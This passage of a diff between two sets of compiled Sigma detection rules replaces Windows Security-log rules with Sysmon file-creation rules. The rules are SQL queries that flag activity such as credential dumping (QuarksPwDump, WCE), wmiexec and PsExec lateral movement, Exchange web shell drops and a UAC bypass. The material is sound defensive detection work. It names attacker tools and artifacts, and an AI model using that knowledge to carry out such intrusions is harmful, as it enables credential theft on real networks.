observed ones, may help to detect lateral movement and remote exec using named pipes", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "author": "Samir Bousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": 
"file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE 
'%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", - "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", + "status": "experimental", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. 
A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - 
"filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "description": "Detects a dump file written by QuarksPwDump password dumper", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web 
shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "status": "experimental", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.execution", + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools 
like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = 
'4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez 
(Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", - "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron 
Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Login with WMI", - "id": "5af54681-df95-4c26-854f-2565e13cfab0", - "status": "stable", - "description": "Detection of logins performed with WMI", - "author": "Thomas Patzke", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Monitoring tools", - "Legitimate system administration" + "Unknown" ], - "level": "low", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_wmi_login.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 